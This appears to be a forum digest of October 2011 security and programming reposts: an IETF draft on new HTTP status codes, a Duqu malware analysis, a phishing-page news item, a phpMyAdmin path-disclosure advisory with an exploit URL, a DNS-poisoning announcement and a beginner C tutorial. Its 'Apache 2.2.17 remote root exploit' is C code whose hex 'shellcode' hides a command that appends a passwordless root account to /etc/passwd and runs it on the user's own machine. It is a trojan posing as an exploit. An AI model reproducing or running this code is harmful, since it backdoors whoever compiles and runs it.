Internet-Draft - Additional HTTP Status Codes Table of Contents 1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . . 3 2. Requirements . . . . . . . . . . . . . . . . . . . . . . . . . 3 3. 428 Precondition Required . . . . . . . . . . . . . . . . . . . 3 4. 429 Too Many Requests . . . . . . . . . . . . . . . . . . . . . 4 5. 431 Request Header Fields Too Large . . . . . . . . . . . . . . 4 6. 511 Network Authentication Required . . . . . . . . . . . . . . 5 7. Security Considerations . . . . . . . . . . . . . . . . . . . . 6 8. IANA Considerations . . . . . . . . . . . . . . . . . . . . . . 7 9. References . . . . . . . . . . . . . . . . . . . . . . . . . . 7 9.1. Normative References . . . . . . . . . . . . . . . . . . . 7 9.2. Informative References . . . . . . . . . . . . . . . . . . 8 Appendix A. Acknowledgements . . . . . . . . . . . . . . . . . . . 8 Appendix B. Issues Raised by Captive Portals . . . . . . . . . . . 8 Authors' Addresses . . . . . . . . . . . . . . . . . . . . . . . . 9 Introduction This document specifies additional HTTP [RFC2616] status codes for a variety of common situations, to improve interoperability and avoid confusion when other, less precise status codes are used. Feedback should occur on the ietf-http-wg@w3.org mailing list, although this draft is NOT a work item of the IETF HTTPbis Working Group. Document: [Docs] [txt|pdf] [Tracker] [Email] [Diff1] [Diff2] [Nits] Versions: 00 01 02 Network Working Group M. Nottingham Internet-Draft Rackspace Updates: 2616 (if approved) R. Fielding Intended status: Standards Track Adobe Expires: April 20, 2012 October 18, 2011 Additional HTTP Status Codes draft-nottingham-http-new-status-02 Abstract This document specifies additional HyperText Transfer Protocol (HTTP) status codes for a variety of common situations. Status of this Memo This Internet-Draft is submitted in full conformance with the provisions of BCP 78 and BCP 79. Internet-Drafts are working documents of the Internet Engineering Task Force (IETF). Note that other groups may also distribute working documents as Internet-Drafts. The list of current Internet- Drafts is at http://datatracker.ietf.org/drafts/current/. Internet-Drafts are draft documents valid for a maximum of six months and may be updated, replaced, or obsoleted by other documents at any time. It is inappropriate to use Internet-Drafts as reference material or to cite them other than as "work in progress." This Internet-Draft will expire on April 20, 2012. Copyright Notice Copyright (c) 2011 IETF Trust and the persons identified as the document authors. All rights reserved. This document is subject to BCP 78 and the IETF Trust's Legal Provisions Relating to IETF Documents (http://trustee.ietf.org/license-info) in effect on the date of publication of this document. Please review these documents carefully, as they describe your rights and restrictions with respect to this document. Code Components extracted from this document must include Simplified BSD License text as described in Section 4.e of the Trust Legal Provisions and are provided without warranty as described in the Simplified BSD License. Nottingham & Fielding Expires April 20, 2012 [Page 1] Internet-Draft Additional HTTP Status Codes October 2011 Table of Contents 1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . . 3 2. Requirements . . . . . . . . . . . . . . . . . . . . . . . . . 3 3. 428 Precondition Required . . . . . . . . . . . . . . . . . . . 3 4. 429 Too Many Requests . . . . . . . . . . . . . . . . . . . . . 4 5. 431 Request Header Fields Too Large . . . . . . . . . . . . . . 4 6. 511 Network Authentication Required . . . . . . . . . . . . . . 5 7. Security Considerations . . . . . . . . . . . . . . . . . . . . 6 8. IANA Considerations . . . . . . . . . . . . . . . . . . . . . . 7 9. References . . . . . . . . . . . . . . . . . . . . . . . . . . 7 9.1. Normative References . . . . . . . . . . . . . . . . . . . 7 9.2. Informative References . . . . . . . . . . . . . . . . . . 8 Appendix A. Acknowledgements . . . . . . . . . . . . . . . . . . . 8 Appendix B. Issues Raised by Captive Portals . . . . . . . . . . . 8 Authors' Addresses . . . . . . . . . . . . . . . . . . . . . . . . 9 Nottingham & Fielding Expires April 20, 2012 [Page 2] Internet-Draft Additional HTTP Status Codes October 2011 1. Introduction This document specifies additional HTTP [RFC2616] status codes for a variety of common situations, to improve interoperability and avoid confusion when other, less precise status codes are used. Feedback should occur on the ietf-http-wg@w3.org mailing list, although this draft is NOT a work item of the IETF HTTPbis Working Group. 2. Requirements The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in [RFC2119]. 3. 428 Precondition Required This status code indicates that the origin server requires the request to be conditional. Its typical use is to avoid the "lost update" problem, where a client GETs a resource's state, modifies it, and PUTs it back to the server, when meanwhile a third party has modified the state on the server, leading to a conflict. By requiring requests to be conditional, the server can assure that clients are working with the correct copies. Responses using this status code SHOULD explain how to resubmit the request successfully. For example: HTTP/1.1 428 Precondition Required Content-Type: text/html <html> <head> <title>Precondition Required</title> </head> <body> <h1>Precondition Required</h1> <p>This request is required to be conditional; try using "If-Match".</p> </body> </html> Responses with the 428 status code MUST NOT be stored by a cache. Nottingham & Fielding Expires April 20, 2012 [Page 3] Internet-Draft Additional HTTP Status Codes October 2011 4. 429 Too Many Requests This status code indicates that the user has sent too many requests in a given amount of time ("rate limiting"). The response representations SHOULD include details explaining the condition, and MAY include a Retry-After header indicating how long to wait before making a new request. For example: HTTP/1.1 429 Too Many Requests Content-Type: text/html Retry-After: 3600 <html> <head> <title>Too Many Requests</title> </head> <body> <h1>Too many Requests</h1> <p>I only allow 50 requests per hour to this Web site per logged in user. Try again soon.</p> </body> </html> Note that this specification does not define how the origin server identifies the user, nor how it counts requests. For example, an origin server that is limiting request rates can do so based upon counts of requests on a per-resource basis, across the entire server, or even among a set of servers. Likewise, it might identify the user by its authentication credentials, or a stateful cookie. Responses with the 429 status code MUST NOT be stored by a cache. 5. 431 Request Header Fields Too Large This status code indicates that the server is unwilling to process the request because its header fields are too large. The request MAY be resubmitted after reducing the size of the request header fields. It can be used both when the set of request header fields in total are too large, and when a single header field is at fault. In the latter case, the response representation SHOULD specify which header field was too large. For example: Nottingham & Fielding Expires April 20, 2012 [Page 4] Internet-Draft Additional HTTP Status Codes October 2011 HTTP/1.1 431 Request Header Fields Too Large Content-Type: text/html <html> <head> <title>Request Header Fields Too Large</title> </head> <body> <h1>Request Header Fields Too Large</h1> <p>The "Example" header was too large.</p> </body> </html> Responses with the 431 status code MUST NOT be stored by a cache. 6. 511 Network Authentication Required This status code indicates that the client needs to authenticate to gain network access. The response representation SHOULD indicate how to do this; e.g., with an HTML form for submitting credentials. The 511 status SHOULD NOT be generated by origin servers; it is intended for use by intercepting proxies that are interposed as a means of controlling access to the network. Responses with the 511 status code MUST NOT be stored by a cache. 6.1. The 511 Status Code and Captive Portals A network operator wishing to require some authentication, acceptance of terms or other user interaction before granting access usually does so by identify clients who have not done so ("unknown clients") using their MAC addresses. Unknown clients then have all traffic blocked, except for that on TCP port 80, which is sent to a HTTP server (the "login server") dedicated to "logging in" unknown clients, and of course traffic to the login server itself. For example, a user agent might connect to a network and make the following HTTP request on TCP port 80: GET /index.htm HTTP/1.1 Host: www.example.com Nottingham & Fielding Expires April 20, 2012 [Page 5] Internet-Draft Additional HTTP Status Codes October 2011 Upon receiving such a request, the login server would generate a 511 response: HTTP/1.1 511 Network Authentication Required Refresh: 0; url=https://login.example.net/ Content-Type: text/html <html> <head> <title>Network Authentication Required</title> </head> <body> <p>You need to <a href="https://login.example.net/"> authenticate with the local network</a> in order to get access.</p> </body> </html> Here, the 511 status code assures that non-browser clients will not interpret the response as being from the origin server, and the Refresh header redirects the user agent to the login server (an HTML META element can be used for this as well). Note that the 511 response can itself contain the login interface, but it may not be desirable to do so, because browsers would show the login interface as being associated with the originally requested URL, which may cause confusion. 7. Security Considerations 7.1. 428 Precondition Required The 428 status code is optional; clients cannot rely upon its use to prevent "lost update" conflicts. 7.2. 429 Too Many Requests Servers are not required to use the 429 status code; when limiting resource usage, it may be more appropriate to just drop connections, or take other steps. 7.3. 431 Request Header Fields Too Large Servers are not required to use the 431 status code; when under attack, it may be more appropriate to just drop connections, or take other steps. Nottingham & Fielding Expires April 20, 2012 [Page 6] Internet-Draft Additional HTTP Status Codes October 2011 7.4. 511 Network Authentication Required In common use, a response carrying the 511 status code will not come from the origin server indicated in the request's URL. This presents many security issues; e.g., an attacking intermediary may be inserting cookies into the original domain's name space, may be observing cookies or HTTP authentication credentials sent from the user agent, and so on. However, these risks are not unique to the 511 status code; in other words, a captive portal that is not using this status code introduces the same issues. 8. IANA Considerations The HTTP Status Codes Registry should be updated with the following entries: o Code: 428 o Description: Precondition Required o Specification: [ this document ] o Code: 429 o Description: Too Many Requests o Specification: [ this document ] o Code: 431 o Description: Request Header Fields Too Large o Specification: [ this document ] o Code: 511 o Description: Network Authentication Required o Specification: [ this document ] 9. References 9.1. Normative References [RFC2119] Bradner, S., "Key words for use in RFCs to Indicate Requirement Levels", BCP 14, RFC 2119, March 1997. [RFC2616] Fielding, R., Gettys, J., Mogul, J., Frystyk, H., Masinter, L., Leach, P., and T. Berners-Lee, "Hypertext Transfer Protocol -- HTTP/1.1", RFC 2616, June 1999. Nottingham & Fielding Expires April 20, 2012 [Page 7] Internet-Draft Additional HTTP Status Codes October 2011 9.2. Informative References [RFC4791] Daboo, C., Desruisseaux, B., and L. Dusseault, "Calendaring Extensions to WebDAV (CalDAV)", RFC 4791, March 2007. [RFC4918] Dusseault, L., "HTTP Extensions for Web Distributed Authoring and Versioning (WebDAV)", RFC 4918, June 2007. Appendix A. Acknowledgements Thanks to Jan Algermissen for his suggestions and feedback. The authors take all responsibility for errors and omissions. Appendix B. Issues Raised by Captive Portals Since clients cannot differentiate between a portal's response and that of the HTTP server that they intended to communicate with, a number of issues arise. One example is the "favicon.ico" <http://en.wikipedia.org/wiki/Favicon> commonly used by browsers to identify the site being accessed. If the favicon for a given site is fetched from a captive portal instead of the intended site (e.g., because the user is unauthenticated), it will often "stick" in the browser's cache (most implementations cache favicons aggressively) beyond the portal session, so that it seems as if the portal's favicon has "taken over" the legitimate site. Another browser-based issue comes about when P3P <http://www.w3.org/TR/P3P/> is supported. Depending on how it is implemented, it's possible a browser might interpret a portal's response for the p3p.xml file as the server's, resulting in the privacy policy (or lack thereof) advertised by the portal being interpreted as applying to the intended site. Other Web-based protocols such as WebFinger <http://code.google.com/p/webfinger/wiki/WebFingerProtocol>, CORS <http://www.w3.org/TR/cors/> and OAuth <http://tools.ietf.org/html/draft-ietf-oauth-v2> may also be vulnerable to such issues. Although HTTP is most widely used with Web browsers, a growing number of non-browsing applications use it as a substrate protocol. For example, WebDAV [RFC4918] and CalDAV [RFC4791] both use HTTP as the basis (for network filesystem access and calendaring, respectively). Nottingham & Fielding Expires April 20, 2012 [Page 8] Internet-Draft Additional HTTP Status Codes October 2011 Using these applications from behind a captive portal can result in spurious errors being presented to the user, and might result in content corruption, in extreme cases. Similarly, other non-browser applications using HTTP can be affected as well; e.g., widgets <http://www.w3.org/TR/widgets/>, software updates, and other specialised software such as Twitter clients and the iTunes Music Store. It should be noted that it's sometimes believed that using HTTP redirection to direct traffic to the portal addresses these issues. However, since many of these uses "follow" redirects, this is not a good solution. Authors' Addresses Mark Nottingham Rackspace Email: mnot@mnot.net URI: http://www.mnot.net/ Roy T. Fielding Adobe Systems Incorporated 345 Park Ave San Jose, CA 95110 USA Email: fielding@gbiv.com URI: http://roy.gbiv.com/ Nottingham & Fielding Expires April 20, 2012 [Page 9] Html markup produced by rfcmarkup 1.97, available from http://tools.ietf.org/tools/rfcmarkup/ Sursa: draft-nottingham-http-new-status-02 - Additional HTTP Status Codes

Phishing page hacked, turned into PSA on the dangers of phishing THURSDAY, OCTOBER 20, 2011 Here's something you don't see very often. Someone - perhaps the recipient of the below phishing mail while having a Falling Down style day at the office - decided enough was enough and set out to hijack the phishing site they were sent to. This is the email that started it all: "You have exceeded the storage limit on your mailbox.You will not be able to send or receive new mail until you upgrade your email. Click the below link and fill the form to upgrade your account. System Administrator" Clicking the link would have taken you to the below phishing form that asks for Username, Password and Email address (along with password verification). Now? Well, it looks a little bit different: The original boxes are gone, replaced by the following message : "There is no such thing as a central email service update a stupid criminal created this to steal your email account I have modified it to educate you about online crime he does not like that but that is too damn bad you can submit this form to see a helpful video about phishing stop letting stupid criminals like this one hijack your account have a great day" Hitting the submit button takes you to a warning video about Phishing scams on CNET. There's no indication left as to how the person now in control of the site obtained the login credentials. Phishing the phisher, perhaps? It does happen from time to time... Author: Christopher Boyd (Thanks to Robert and Wendy for this one) Sursa: GFI LABS Blog: Phishing page hacked, turned into PSA on the dangers of phishing Like!

The Day of the Golden Jackal - The Next Tale in the Stuxnet Files: Duqu Tuesday, October 18, 2011 at 10:49am by Guilherme Venere and Peter Szor Stuxnet was possibly the most complex attack of this decade, and we expected that similar attacks would appear in the near future. One thing for sure is that the Stuxnet team is still active–as recent evidence has revealed. McAfee Labs received a kit from an independent team of researchers that is closely related to the original Stuxnet worm, but with a different goal–to be used for espionage and targeted attacks against sites such as Certificate Authorities (CAs). How do we know it was the Stuxnet team? To start with, the attacks are targeting CAs in regions occupied by “Canis Aureus,” the Golden Jackal, to execute professional targeted attacks, against sites such as CAs. The Stuxnet worm utilized two “stolen” digital certificates belonging to two companies from Taiwan that operated in the same business district. Yet, the Stuxnet-related code, named Duqu, which McAfee Labs received as part of an on-going investigation, was signed with yet another key belonging to the company C-Media Electronics, in Taipei. It is highly likely that this key, just like the previous two known cases, was not really stolen from the actual companies, but instead directly generated in the name of such companies at a CA as part of a direct attack. The threat that we call Duqu is based on Stuxnet and is very similar. Only a few sites so far are known to have been attacked by the code, and it does not have PLC functionality like Stuxnet. Instead, the code, delivered via exploitation, installs drivers and encrypted DLLs that function very similarly to the original Stuxnet code. In fact, the new driver’s code used for the injection attack is very similar to Stuxnet, as are several encryption keys and techniques that were used in Stuxnet. Duqu is very time sensitive, and is controlled by an extended, encrypted configuration file. It communicates with a command server in India. This IP address has since been blacklisted at the ISP and no longer functions. Yet it was specially crafted to execute sophisticated attacks against key targets and has remote control functionality to install new code on the target. These include keyloggers, which can monitor all actions on systems: running processes, window messages, and so on. Furthermore, the keylogger component also contains functionality to hide files with a user-mode rootkit. The file names of the SYS drivers can be cmi4432.sys and jminet7.sys. They relate to two groups of files that have similar functionality. A third file implements the keylogging functions. McAfee detects the packages as PWS-Duqu, PWS-Duqu.dr, and PWS-Duqu!rootkit. Both SYS files have almost the exact same code, with a few differences. The main difference is the fact that one of them is digitally signed with a certificate belonging to C-Media, while the other is not. Here is an example of the certificate that seemingly belongs to C-Media: Since the discovery of this malware, the certificate above has been revoked by VeriSign as we can see in the image below: Certificate revoked by VeriSign The purpose of the SYS file seems to be only to decrypt and execute the primary payload DLL. Each SYS file works with a different set of files that in turn generate different DLLs. The graph below shows the connections found between the samples so far: File relationships for PWS-Duqu As we can see above, the method used by both SYS files is very similar. The PNF file is an encrypted DLL that is decrypted and injected into arbitrary system processes. This DLL in turn decrypts another DLL that contains the malicious code used to hide the presence of the malware in memory. Both groups above also contain another module, sortXXXX.nls (where XXXX can be any hexadecimal character), shown in red above. It seems to be responsible for the malware’s malicious activities, such as command and control communications. The keylogger module works a little differently from the SYS files, but it also uses a module with the same name as the other components. This file is hidden using the same method as the other modules. Although the files are different, both rootkits work more or less in the same way. Another relationship among the keylogger and the other two modules is that each uses the same decryption key for the strings stored in its data section. The strings indicate these modules have the capability to disable security tools, targeting some specific antivirus products. McAfee Labs advises Certificate Authorities to carefully verify if their systems might have been affected by this threat or any variations. As we publish this blog, McAfee Labs has also identified a likely variation of this attack at another site. McAfee Labs would like to thank the independent team working on the investigation of this case and their contributions to our research. Sursa: https://blogs.mcafee.com/mcafee-labs/the-day-of-the-golden-jackal-%E2%80%93-further-tales-of-the-stuxnet-files

phpMyAdmin 3.4.5 – Full path disclosure in phpmyadmin.css.php phpMyAdmin 3.4.5 suffers of insufficient input validation of the parameter js_frame in phpmyadmin.css.php, exposing information that could be used in further attacks. CVE Entry: CVE-2011-3646 CWE: CWE-20, CWE-200 PMASA ENTRY: PMASA-2011-15 ========= Description The script returns an error message, containing the full path if the js_frame parameter is defined as an array. ========= Exploit No authentication needed to exploit this vulnerability. http://example.com/path_to_phpmyadmin/phpmyadmin.css.php?js_frame[]=right ========= Official fix http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin;a=commitdiff;h=d35cba980893aa6e6455fd6e6f14f3e3f1204c52 ========= Credits Discovered by Mihail Ursu ( http://securitate.md/ ) on 12 Sep 2011. ========= Disclosure Timeline Reported to vendor on 12 Sep 2011. Confirmation from vendor 21 Sep 2011. Patch confirmation 4 Oct 2011. Official fix and public disclosure 17 Oct 2011. Sursa: http://seclists.org/fulldisclosure/2011/Oct/690 Poate fi foarte util.

DNS Poisoning via Port Exhaustion Hey, Today we are releasing a very interesting whitepaper which describes a DNS poisoning attack against stub resolvers. It discloses two vulnerabilities: 1. A vulnerability in Java (CVE-2011-3552, CVE-2010-4448) which enables remote DNS poisoning using Java applets. This vulnerability can be triggered when opening a malicious webpage. A successful exploitation of this vulnerability may lead to disclosure and manipulation of cookies and web pages, disclosure of NTLM credentials and clipboard data of the logged-on user, and even firewall bypass. 2. A vulnerability in multiuser Windows environments which enables local DNS cache poisoning of arbitrary domains. This vulnerability can be triggered by a normal user (i.e. one with non-administrative rights) in order to attack other users of the system. A successful exploitation of this vulnerability may lead to information disclosure, privilege escalation, universal XSS and more. Whitepaper: http://bit.ly/q31wSq A blog post with video demos: IBM Rational Application Security Insider: DNS poisoning via Port Exhaustion Download: http://blog.watchfire.com/files/dnsp_port_exhaustion.pdf Roee Hay <roeeh () il ibm com>, IBM Rational Application Security Research Group Yair Amit <yairam () gmail com> Sursa: Full Disclosure: DNS Poisoning via Port Exhaustion

Apache 2.2.17 remote root exploit /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and i will find you ~ desg */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <strings.h> #include <netdb.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> char evil[] = "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89" "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89" "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8" "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23" "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74" "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a" "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68" "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44" "\x44\x44"; #define NOP 0x90 #define BSIZE 1000 #define OFFSET 400 #define ADDR 0xbffff658 #define ASIZE 2000 int main(int argc, char *argv[]) { char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if (argc != 2) { printf("%s <target>\n", argv[0]); exit(1); } buffer = (char *) malloc(BSIZE + ASIZE + 100); if (buffer == NULL) { printf("Not enough memory\n"); exit(1); } memcpy(&buffer[BSIZE - strlen(evil)], evil, strlen(evil)); buffer[BSIZE + ASIZE] = ';'; buffer[BSIZE + ASIZE + 1] = '\0'; hp = gethostbyname(argv[1]); if (hp == NULL) { printf("no such server\n"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Can't open socket\n"); exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refused\n"); exit(1); } printf("sending exploit code...\n"); if (send(s, buffer, strlen(buffer), 0) != 1) printf("exploit was successful!\n"); else printf("sorry, this site isn't vulnerable\n"); printf("waiting for shell.....\n"); if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); while (1) { /* shell */ } } Sau: [C] /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and - Pastebin.com Discutie aici, e posibil sa nu fie exploit: Full Disclosure: Apache 2.2.17 exploit?

Analysis of 250,000 hacker conversations Posted on 17 October 2011. Imperva released a report analyzing the content and activities of an online hacker forum with nearly 220,000 registered members, although many are dormant. This forum is used by hackers for training, communications, collaboration, recruitment, commerce and even social interaction. Commercially, this forum serves as a marketplace for selling of stolen data and attack software. The chat rooms are filled with technical subjects ranging from advice on attack planning to solicitations for help with specific campaigns. This forum is also a place where curious neophytes can find "how-to-hack" tutorials on various methods. The report not only provides insight into hacker psychology, but also details the technical strategies they learn, develop and deploy. "Studying hacker forums is important to providing insights into hacker psychology and technical strategies," explained Imperva CTO Amichai Shulman. "Hacker forums are still not well understood by many in the security community, and we believe that studying and quantifying what happens in these online communities can lead to the development of strategies to combat cybercrime." The findings include: Examples of hacker communications, collaboration, recruitment, commerce and social interaction activities. Attack discussions on this forum increased over the four-year period of analysis, growing an average of 157% year over year between 2007 and 2010. The most discussed topics in this forum from June 2010 to June 2011 were Dos/DDoS attacks, with 22% of discussions, followed by SQL injections, which comprised 19% of all discussions. 25% of discussions from June 2010 to June 2011 focused on "beginning" hacking, with members devoting 6% of their time sharing "how-to" tutorials and discussing basic methodologies, indicating a strong, steady interest from new talent. Mobile hacking has seen very strong growth in this forum from 2007 to 2010, with iPhone hacking leading the way. The complete report is available here: http://www.net-security.org/dl/articles/Imperva_Oct2011.pdf Sursa: Analysis of 250,000 hacker conversations

C development on Linux - Introduction - I. Category: Linux Development Published on Monday, 17 October 2011 13:26 Contents 1. Introduction 1.1. Why C? 2. About C 2.1. History 2.2. Classification 2.3. Our approach 3. The necessary tools 4. The compilation process 5. Example C program 6. Conclusion 1. Introduction What you're just reading is the beginning of series of articles dedicated to development on Linux systems. However, with minor modifications (if any), you will be able to use this knowledge you will get by reading our series on any other system that uses the same tools (OpenIndiana, BSD...). This first article will deal gradually with the intricacies of writing C code on Linux. You are expected to have basic programming knowledge, either on Linux/Unix systems or on other platforms. The idea is that you should know the basics of programming, like what a variable is or how to define a structure. Even though, you will get this information from this article, we won't insist very much on beginner-level concepts. A word of warning: we won't include everything there is to tell about C, because that would take lots of space and of course, we don't actually know everything about C. 1.1. Why C? Some of you might argue that C is not the best beginner-level language ever. Agreed, but again, you're expected to have some basic programming knowledge, for one. Second, C and Unix, and Linux afterwards, are intimately tied together that it only seemed natural to start our development series with C. From the kernel, of which a substantial part of it is written in C, to lots of everyday user-land applications, C is used massively on your Linux system. For example, GTK is based on C, so if you're using Gnome or XFCE applications, you're using C-based applications. C is an old, well-established programming language, vital tool in many parts in the IT world, from embedded systems to mainframes. Therefore, it is only fair to assume that C skills will not only enrich your CV, but they will also help you to solve many issues on your Linux system, that is only if you take this seriously and practice a lot by reading and writing C code. 2. About C 2.1. History C is more than 40 years old, with beginnings at Bell Labs with Brian Kernighan, Dennis Ritchie and Ken Thompson as the "usual suspects." Unix development and C's evolution are intimately linked, as we said, because Unix was initially written in assembly, but that had lots of shortcomings. Therefore, when moving to the PDP-11 as the main hardware platform, the developers started C as the as a core language for Unix. In 1978, Kernighan and Ritchie wrote, "The C Programming Language," a book that is today as it was 20 years ago: THE book on C programming. We heartily recommend you get it. 2.2. Classification There are always people keen on classification of things and of course, programming is no different. Joking aside, since we're at the beginning, we thought you should know that C is a procedural structured programming language, with weak typing. What we just said, in English, is that C uses procedures (the usual name used by C programmers, and the one we'll use as well, is functions however), that it uses a structured approach (think blocks of code) and finally, it supports implicit type conversions. If you don't know what any of the above means, fear not, you'll find out! 2.3. Our approach This article which is just the introductory part and we will regularly publish next parts where each chapter will deal with an important part of the language: variables, pointers, structs, etc. ( subscribe to RSS if you have not done so yet ) At the end of the theoretical part, we will show you a practical example, for which we chose yest, a tiny piece of software written by Kimball Hawkins (thanks, Kimball). We will compile it, then package it for Debian and Fedora systems. Debian developer Andree Leidenfrost will then show you how to submit our new package to Debian repository, making sure we respect all package requirements to be admitted to Debian distribution (thanks, Andree). We recommend you to try our examples on your system, take some time to examine the code and try to make modifications of your own. 3. The necessary tools Before we begin, let us make sure we have all essential tools installed on your Linux system. You will need a compiler, namely gcc, the binutils package and a text editor or an IDE. Whether you choose text editor or some sort of IDE depends largely on your preferences, but more on that later. Depending on your Linux distribution and installation options you have used, you might already have the necessary tools installed. We put together a tiny script to help you see whether you have all mandatory development tools installed: #!/bin/sh gcc -v if [ $? != 0 ]; then echo "GCC is not installed!" fi ld -v if [ $? != 0 ]; then echo "Please install binutils!" fi Save this script as devtoolscheck.sh, run it: $ sh devtoolscheck.sh On my machine I get following output: $ sh devtools.sh Using built-in specs. COLLECT_GCC=gcc COLLECT_LTO_WRAPPER=/usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/lto-wrapper Target: x86_64-linux-gnu Configured with: ../src/configure -v --with-pkgversion='Debian 4.6.1-4' --with-bugurl= file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=c,c++,fortran,objc,obj-c++,go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch [config options snipped] Thread model: posix gcc version 4.6.1 (Debian 4.6.1-4) GNU ld (GNU Binutils for Debian) 2.21.52.20110606 Why you need binutils binaries and gcc, you will see shortly. Now let's focus a bit on "editor vs IDE" question. The only thing we will advise you in this respect is "use what you feel comfortable with and disregard what others tell you". This matter is very subjective and it depends on many variables. For example, if you develop (or used to develop) on other operating systems, you might be used to an IDE. You will find many good IDEs on Linux, including Eclipse, Geany, KDevelop or Anjuta. Try installing them to see what you find more suitable. On the other hand, if you want to go the simple editor way, there are lots of options here as well: vi(m), emacs, kate, nano, jed and so on. By searching the Internet you will find a lot of discussions regarding what the best editor is. We say install few of them and find out what suits you best. You are the only judge of this, and it will be a tool you will use frequently, so take your your time, use it, read about it and get familiar with it. Regardless of your choice, we will assume that you have made your choice in regards to the editing tool and you are familiar with its use. 4. The compilation process In simple words, this process is what starts from the source code you wrote and if all goes well the result is an executable binary or a library. Needless to say, there's more to it but it is essential for you to understand the above sentence before you move on. You do not need to memorize all the concepts now as they will become clearer later. At this stage it's only important to get the general idea. Let's say we have the source code written and now we want a compiler to process it and give us the executable binary. The workflow of this process is illustrated on your right. Please note that this is applicable only to C, which is a compiled language, as opposed to interpreted languages (Perl, Python, Shell), and we will refer strictly to gcc and friends for the rest of our guide. As the figure on your right illustrates the preprocessor (cpp) takes your source code, looks for preprocessor instructions (in C, they start with a hash) and if everything looks right, the result is an output understandable by compiler. The compiler (gcc) does all the hard work, including code optimization for the underlying hardware (if you are interested in compiler theory or cross-compilation, there are lots of good books on the subject, but we assume a more beginner level here). The result is assembly code, intimately close to the machine, from which the binaries will be generated (as is the tool). In the end, depending on the options and the code, "ld" will link the executable to all necessary libraries and voila! the end result: your program. If you want to see all the resulting intermediate files, gcc flag -save-temps as will help you to do so. We recommend you read the gcc manual page, at least frugally, and make sure that your compiler us up to date. You will get used to usual gcc flags by reading our examples, but you are expected to know what they do, not just copy and paste commands you see on the screen. 5. Example C program Every self-respecting programming tutorial starts with a "Hello, world" program. This program does nothing else but print "Hello, world!" on the screen, then exits. It's used to illustrate the very basic structure of a program and some essential concepts. So, without further ado, here it is. #include <stdio.h> /* This is a comment */ int main() { printf("Hello, world!\n"); return 0; } Now, let us dissect the program line by line and see what each line represents. The first one is a preprocessor directive (see above) which asks for the stdio.h file, which provides the definition for the printf function. Header files are files that usually contain various definitions (functions, variables...) and make .c files less cluttered. All what a source file (.c) will need is an #include statement and possibly an argument to the linker. Everything that's defined in the included header file will be available in your source code. main() is a mandatory function in every C program. As the name states, the main activity will happen here, regardless of how many functions you have defined. int main() means that this function does not have any arguments (the empty parentheses) and that it returns an integer (the initial int). All these will be discussed later. The most important thing here is the printf function, which takes our text as an argument and displays it. "\n" means "newline" and it's the equivalent of using the Enter key (or ^M). It is called an escape sequence and all escape sequences in C begin with "\". For example, to better understand what an escape sequence is, imagine you're writing HTML code and you need to print a "<" character. HTML's syntax uses angle brackets to define HTML tags, so chances are your bracket will be interpreted as HTML code instead of being displayed. So, what to do? We escape it with "<" and it will appear properly. Just the same, if you want to insert a newline character, you can't type it directly, as the compiler could care less if you write your program on a single line or not and therefore you you need to escape your new line character with "\n". return 0 tells the compiler that everything is ok and the execution of main() function ends there. That is because 0 is the code for successful execution, while values greater than 0 (integers) is an indication that something went wrong. The curly braces that begin and end the main function delimit its' execution block, that is, what happens in main(), stays in main(). You may have noticed the semicolons at the end of the statements: they are mandatory as a sign that the current statement ended there, but they are not to be used in preprocessor directives as #include. 6. Conclusion We hope we didn't cram too much information in your brain and that you will enjoy staying with us on this programming tutorial. Part 2 will be dealing with a comparison between C and other programming languages in order to help those who already have some experience in development. So make sure you are subscribed to our RSS feed so you'll know when part two arrives. Here's what you should expect: I. C development on Linux - Introduction II. Comparison between C and other programming languages III. Types, operators, variables IV. Flow control V. Functions VI. Pointers and arrays VII. Structures VIII. Basic I/O IX. Coding style and recommendations X. Building a program XI. Packaging for Debian and Fedora XII. Getting a package in the official Debian repositories We reserve the right to alter the list at any time necessary. Seriously, although this is a rough overview of what's to come, we might change our mind regarding titles or subtopics, but the general idea will be as above. [EDIT]: Today, 08.10.2011, marks the sad event of Dennis Ritchie passing away after a long struggle with illness. We cannot even begin to comprise the influence he had on the IT industry. Dennis, we owe you so much. This guide is dedicated to your memory. May you rest in peace. About Author: Rares Aioanei I'm using Linux/BSD since about 2003, passionate about everything that involves Linux/BSD and Free Software. Contributor to various FOSS projects and your average system administrator in everyday life. Sursa: C development on Linux - Introduction - I.

